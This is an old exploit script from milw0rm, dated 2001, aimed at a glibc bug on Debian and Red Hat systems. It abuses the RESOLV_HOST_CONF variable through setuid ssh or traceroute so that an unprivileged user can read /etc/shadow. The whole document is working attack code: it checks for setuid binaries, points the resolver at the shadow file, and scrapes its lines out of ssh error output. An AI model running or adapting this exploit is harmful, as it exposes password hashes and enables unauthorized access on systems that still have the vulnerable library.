# Charles Stevenson # glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0) # This exploits is for glibc >= 2.1.9x. # (****krochos@linuxmail.org****) # Edit this if you have a problem with path ssh=/usr/bin/ssh traceroute=/usr/sbin/traceroute FILE=/etc/shadow # File to read ############################################################################### echo "$ssh" echo "[*] Checking permisions..." if [ ! -u $ssh ]; then echo "$ssh is NOT setuid on this system or does not exist at all!" if [ ! -u $traceroute ]; then echo "$traceroute is NOT setuid on this system or does not exist at all!" exit 0 fi fi export RESOLV_HOST_CONF=$FILE echo "[*] Glibc bug found by Charles Stevenson " echo "[*] krochos@linuxmail.org" sleep 1 echo "[*] export RESOLV_HOST_CONF=/etc/shadow" ssh lt 2>/tmp/.resolv cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} ' # milw0rm.com [2001-01-25]